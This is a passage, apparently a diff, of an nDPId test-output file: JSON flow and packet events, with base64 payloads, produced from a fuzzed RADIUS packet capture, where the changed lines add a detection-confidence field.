ZjA6NzmPNjA6ZDE6N2Q6MzcvMjIwBAasFAEQIA5WWldOMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJOBcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNEAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAAA4IRSqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997257160,"flow_last_seen":1528997257160,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997257160,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997257160,"flow_last_seen":1528997257160,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997257160,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":112,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997257373,"flow_last_seen":1528997257373,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997257373,"l3_proto":"ip4","src_ip":"198.230.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00711{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1528997257373,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"ts_msec":1528997257373,"pkt":"ABRP+4rqcNuYVcUnCABFAADh\/rJAAPwRVQ7G5hk+CgxAHgcUchAAzVNaC0IAxU8cxybfn6wHKrLckjIf7\/YBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE1ODkvZjA6Nzk6NjA6ZDE6JQA6MzcvMjIwT0oBAgBIFwEAAAEFAAAT7kZq++1qq413Vnves+S4AgUAAGvzvZs2igAAfRnGIlbt+UCLAQACCwUAACpMCwseOO2rxFCxvsNqPXlQEr\/1MOfsnBTEG6mXYQrsxeM="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997257373,"flow_last_seen":1528997257373,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997257373,"l3_proto":"ip4","src_ip":"198.230.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997257373,"flow_last_seen":1528997257373,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997257373,"l3_proto":"ip4","src_ip":"198.230.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 01357{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1528997257654,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"ts_msec":1528997257654,"pkt":"AAAMB6xAABRP+4rqCABFAALHtOxAAP8RAAAKDEAexuIZPnIQBxQCswAAAUMCq5uzeWdoQ9XaV+du1V6\/V3caCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADh2DQM1NwZbIqWJATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktOzAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGEjMDAwMDAwYmQ4OWE1MjI1YiwgNWIyMmE1ODkvZjA6kDk6NjA6ZDE6Nz06MzcvMjIwBAasFCEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TyYCAgAkF1MAAAsFAAB8YVHX9NNxZiI6Ac8JyMuzAwIAIPh24VkaFAAAV8gHDlZaV0MyVGVzdExhYhoKAABXyAgERVQaEAAAV8gKClN0dW5kYXJkGhAAAFfICwpUZXN0IExhYhoJAABXyA8DMRoKAABXyBEETkoaEQABV8gRC0x5bmRodXJzdBoMAABXJQAGAAAAyRoXAABXyB0RVlpXIEMyIFRlc3QgTGFiGgsAACUAJQVWelcaDVUAOCEOBzA3MDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbGlkIBZhbHVlGh0AADghExc0MC44MDQ4ODJOLTc0LjEwMjgzOVcaDAAAOCEUBgAAAQIaDAAAOCEVBgAAAAIaFQAAOHYWD1N0YWRpdW1EaXJlY3QaDAAABYMHBsBQSplQEvBhLMiblyIbL73lEJVrr1A="}
 00813{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1528997257842,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":318,"pkt_l4_len":284,"ts_msec":1528997257842,"pkt":"ABRk+4rqcNuYVcUnCABFAAEw\/rdAAPwRVLrG4hk+CgxAHgcUchABHBAqAkMBFJKUOcPLMsHSqD8mDFCtU+4aCwAAV8gbBVNQQxouAAABNxA0pLyUW3Ovb6JdG1WHoXHa1uRHR4Oqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
 00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":118,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997260021,"flow_last_seen":1528997260021,"flow_idle_time":600000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":0,"ts_msec":1528997260021,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.64.30","l4_proto":85,"flow_datalink":1,"flow_max_packets":3}
 00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1528997260021,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":192,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":192,"pkt_l4_len":158,"ts_msec":1528997260021,"pkt":"ABRP+4rqcNuYVcUnCABFAACy\/sZAAPxVVSnG4hk+CgxAHgcUchAAnp2\/A0UAlvMIt1JJhr\/PERoAnbXM5t8BNTAzMTE0czAxNTg4NDk2ODVAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywSN0ExM0FEN0UxOTJDQjEwQRIiMzI3NjQgU3Vic2NyaWJlciBub3QgcCUAdmlzaW9uZSUABwQBAAcAUBIlCbhyzGO3iZxohSCASLvo"}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997261783,"flow_last_seen":1528997261783,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997261783,"l3_proto":"ip4","src_ip":"198.226.82.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00711{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1528997261783,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"ts_msec":1528997261783,"pkt":"dxRP+4rqcNuYVcUnCABFAADh\/sxAAPwRVP3G4lI1CgxAHgcUchAAzQ3qC0YAxVP5rh2w5Lj8PI2upF4y\/0IBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXT3b3JrLm9yZywgNWIyMmE1ODkvZjA6N+g6NjA6ZDE6N2Q6MzcvMjIwT0oBAgBIFwEAAAEFAADvkK66gUfrDsISd3KA2Dq0AgUAAEGPAVxuDAAAtFagJxCAdoSLAQACCwUAAF3vTu1rfeBtyKrBBShZZHpQEiKq\/RQqlqya5NkwR6FJjV0="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997261783,"flow_last_seen":1528997261783,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997261783,"l3_proto":"ip4","src_ip":"198.226.82.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997261783,"flow_last_seen":1528997261783,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997261783,"l3_proto":"ip4","src_ip":"198.226.82.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 01265{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":121,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"ts_msec":1528997262078,"pkt":"AAAMB6xAABRP+4rqCABFAALHIP0lAP8RAAAKDEAexuIZNXIQBxQCswAAAUcCq0DUTgiBVRdCBPZhxwMy\/T4aCiUAV3EOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM2NwZbIqWOATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yaS5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjODAwMDAwYmQ4OWE1MjI1YiwgNWIyMmE1ODkvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjIwBAasFAFKIA5WWldDMlQxc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TyYCAgAkVAEAAAsFAADE2f3MRJYt4jvAki9JKC\/7AwIAIHMK7AgaFAAAV8gHDlZaV0MyVGVzdExhYhoKAABXyAgERVQaEAB2V8gKClN0YW5kYXJkGhAAAFfICwpUZXN0IExhYhoJAABXyA8DMRoKAABXyBAETkoaEQAAZ8gRC0x5bmRodXJzdBoMABBXyBIGAAAAyRoXAABXyB0RVlpXIEMyIFRlc3QgTGFiGgsAAFfIJQVWelcaDQAAOCEOBzA3MDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbGlkIFZhbHVkGh0AADghExc0MC44MG84ODJOLTc0LjEwMjgzOVcaDAAAOCEUBgAAAQIaDAAAOCEV\/QAAAAIaFQAAOCEWD1N0YWRpdW1EaXJlY3QaDAAABYMHBsBQSplQEsOMLEiMSdbl\/UWsrT5hVfA="}
 00201{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":121,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":691}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997262272,"flow_last_seen":1528997262272,"flow_idle_time":180000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":276,"midstream":0,"ts_msec":1528997262272,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1895,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00817{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1528997262272,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":318,"pkt_l4_len":284,"ts_msec":1528997262272,"pkt":"ABRP+4rqcNuYVcUlCABFAAEw\/tJAAPwRVKjG4hk1CgxAHgdnchABHO9uAkcBFNPCS391ou+9cV+4e8winsYaCwAAV8gbBVNQQxpuAAABNxA00HHPRTyBsiZ\/6IZyvYM7SEcCX4QDUPpLB\/Nfl+7+pUh0wsa+NLqA2uxWkFDu5HiEeuARNLVaDzSIzbsbfVqWHWeSG0JbhaHnOPPCnMTZqtKCAvxt6AWKG1d8LjPCNKE\/ymsqNvHxATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmcsIDViMjJhNTg5L2YwOjc5OjYwOmQxOjdkOjM3LzIyMFkMOTA4NDIxMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBJTw+nZtWuGBh7\/qdpxMTkR"}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":123,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997265856,"flow_last_seen":1528997265856,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997265856,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":30224,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01384{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1528997265856,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"ts_msec":1528997265856,"pkt":"AAAMB6xAABRP+4rqCABFAALbIP5AAP8RAAAKDEAexuIZNXYQBxQCxwAAAUgCv9O29T0SiGycOGqRBCMxDvYaWgAAV8gOBFVTGgwAAFfIDQZ3aaRpGg8AAFfICQlXSVNQUjEwGgkAADghDQM2NwZbIqWRATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d21yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtt2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XJQBpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWmVPTEwZmYxMGFjMDAwMDAwYmQ4OWE1MjI1YiwgNWIyMmE1ODkvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjIwBAasHAEQIA5WWldDMlRlc3RMYGIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAPAZRBDU2TzoCAQA4ATAzMTE0ODAwNzM2MzgwNzJAd2xhbi5wbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyIoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfINhFWWlcgQzIgVGVzdCBMYWIaCwAAV8YlBVZ6VxoNAAA4IQ4HMDcwNzEabQAAOCERBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tdjQuMTAyODM5Vxr2AAA4IRQGAAABAhoMAABnIRUGAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVASXNvLQ3D63zYosbefsmlVrg=="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997265856,"flow_last_seen":1528997265856,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997265856,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":30224,"dst_port":1812,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997265856,"flow_last_seen":1528997265856,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997265856,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":30224,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":124,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997266054,"flow_last_seen":1528997266054,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997266054,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.56.64.30","src_port":1812,"dst_port":9472,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00711{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1528997266054,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"ts_msec":1528997266054,"pkt":"ABRP+4rqcNuYVcUnCABFAADh\/tpAAPwRVO\/G4hk1CjhAHgcUJQAAzZq1C0gAxTQDE\/syEk8COAKXrk0TJQABNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuTHR3b3JrLm9yZywgNWIyMmE1ODkvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjIwT0oBAgBIFwEAAAEFAADQlOBVyiA51UB5+BTRf1Z+AgUAAJqmOeZiwwAAElk1sqzX2LSLAQACCwUAAAF5eGigvLsuc5FvQXnfthRQEr72IV3uvADHqUwosXSRIBM="}
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997266054,"flow_last_seen":1528997266054,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997266054,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.56.64.30","src_port":1812,"dst_port":9472,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997266054,"flow_last_seen":1528997266054,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997266054,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.56.64.30","src_port":1812,"dst_port":9472,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":128,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997294408,"flow_last_seen":1528997294408,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997294408,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.28.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00711{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1528997294408,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"ts_msec":1528997294408,"pkt":"ABRP+4rqcNuYVcUnCABFAADh\/xpAAPsRVa\/G4hk1ChxAHgcUchAAzU8kC0oAxWEDMLFDKTYIfgbKyEyHMfIBNTAzMTE0ODAyNTA4NjQ2MjhAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE1YWUvMDA6NTY6Y2Q6NmQ6NDI6NTkvMjIxT0oBAjRIFwEAAAEFAACfFoRHbsDvI\/+46yBaysIsAgUAAJcLQv7ORgAASiNmmimRHNuLAQACCwUAAKEH8wkM8t7F6HlgkovXWwdQEo++iUihP9VHkRTh6mD7kgU="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997294408,"flow_last_seen":1528997294408,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997294408,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.28.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997294408,"flow_last_seen":1528997294408,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997294408,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.28.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 01262{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":129,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"ts_msec":1528997294665,"pkt":"AAAMB6xAqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq